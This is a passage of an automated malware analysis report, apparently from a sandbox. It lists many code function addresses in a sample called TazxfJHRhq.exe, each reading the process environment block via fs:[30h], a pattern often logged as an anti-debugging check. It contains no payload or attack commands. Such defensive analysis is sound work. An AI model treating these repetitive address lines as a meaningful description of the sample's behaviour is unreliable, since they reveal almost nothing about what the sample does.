          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]1_2_00AF3884
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]1_2_00AF3884
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]1_2_00A740E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]1_2_00A740E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]1_2_00A740E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A758EC mov eax, dword ptr fs:[00000030h]1_2_00A758EC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]1_2_00B44015
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]1_2_00B44015
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]1_2_00AF7016
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]1_2_00AF7016
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]1_2_00AF7016
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B32073 mov eax, dword ptr fs:[00000030h]1_2_00B32073
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B41074 mov eax, dword ptr fs:[00000030h]1_2_00B41074
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]1_2_00A90050
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]1_2_00A90050
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF69A6 mov eax, dword ptr fs:[00000030h]1_2_00AF69A6
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]1_2_00AA61A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]1_2_00AA61A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C182 mov eax, dword ptr fs:[00000030h]1_2_00A9C182
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA185 mov eax, dword ptr fs:[00000030h]1_2_00AAA185
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2990 mov eax, dword ptr fs:[00000030h]1_2_00AA2990
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A7B1E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A7B1E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A7B1E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B041E8 mov eax, dword ptr fs:[00000030h]1_2_00B041E8
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A94120 mov ecx, dword ptr fs:[00000030h]1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]1_2_00AA513A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]1_2_00AA513A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]1_2_00A79100
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]1_2_00A79100
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]1_2_00A79100
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C962 mov eax, dword ptr fs:[00000030h]1_2_00A7C962
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]1_2_00A7B171
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]1_2_00A7B171
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]1_2_00A9B944
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]1_2_00A9B944
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A8AAB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A8AAB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]1_2_00AAFAB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]1_2_00AAD294
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]1_2_00AAD294
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]1_2_00AA2AE4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2ACB mov eax, dword ptr fs:[00000030h]1_2_00AA2ACB
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]1_2_00AB4A2C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]1_2_00AB4A2C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A88A0A mov eax, dword ptr fs:[00000030h]1_2_00A88A0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]1_2_00B3AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]1_2_00B3AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]1_2_00A7AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]1_2_00A7AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A93A1C mov eax, dword ptr fs:[00000030h]1_2_00A93A1C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov ecx, dword ptr fs:[00000030h]1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB927A mov eax, dword ptr fs:[00000030h]1_2_00AB927A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]1_2_00B2B260
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]1_2_00B2B260
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48A62 mov eax, dword ptr fs:[00000030h]1_2_00B48A62
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3EA55 mov eax, dword ptr fs:[00000030h]1_2_00B3EA55
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B04257 mov eax, dword ptr fs:[00000030h]1_2_00B04257
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]1_2_00AA4BAD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]1_2_00AA4BAD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]1_2_00AA4BAD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B45BA5 mov eax, dword ptr fs:[00000030h]1_2_00B45BA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]1_2_00A81B8F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]1_2_00A81B8F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2D380 mov ecx, dword ptr fs:[00000030h]1_2_00B2D380
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3138A mov eax, dword ptr fs:[00000030h]1_2_00B3138A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAB390 mov eax, dword ptr fs:[00000030h]1_2_00AAB390
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2397 mov eax, dword ptr fs:[00000030h]1_2_00AA2397
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A9DBE9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]1_2_00AF53CA
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]1_2_00AF53CA
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3131B mov eax, dword ptr fs:[00000030h]1_2_00B3131B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A7DB60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]1_2_00AA3B7A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]1_2_00AA3B7A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7DB40 mov eax, dword ptr fs:[00000030h]1_2_00A7DB40
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48B58 mov eax, dword ptr fs:[00000030h]1_2_00B48B58
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7F358 mov eax, dword ptr fs:[00000030h]1_2_00A7F358
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8849B mov eax, dword ptr fs:[00000030h]1_2_00A8849B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B314FB mov eax, dword ptr fs:[00000030h]1_2_00B314FB
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AF6CF0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AF6CF0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AF6CF0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48CD6 mov eax, dword ptr fs:[00000030h]1_2_00B48CD6
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AABC2C mov eax, dword ptr fs:[00000030h]1_2_00AABC2C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]1_2_00B4740D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]1_2_00B4740D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]1_2_00B4740D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9746D mov eax, dword ptr fs:[00000030h]1_2_00A9746D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]1_2_00B0C450
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]1_2_00B0C450
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA44B mov eax, dword ptr fs:[00000030h]1_2_00AAA44B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA35A1 mov eax, dword ptr fs:[00000030h]1_2_00AA35A1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]1_2_00B405AC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]1_2_00B405AC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AA1DB5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AA1DB5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AA1DB5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]1_2_00AAFD9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]1_2_00AAFD9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B28DF1 mov eax, dword ptr fs:[00000030h]1_2_00B28DF1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A8D5E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A8D5E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48D34 mov eax, dword ptr fs:[00000030h]1_2_00B48D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3E539 mov eax, dword ptr fs:[00000030h]1_2_00B3E539
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]1_2_00AA4D3B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]1_2_00AA4D3B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]1_2_00AA4D3B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AD30 mov eax, dword ptr fs:[00000030h]1_2_00A7AD30
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AFA537 mov eax, dword ptr fs:[00000030h]1_2_00AFA537
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
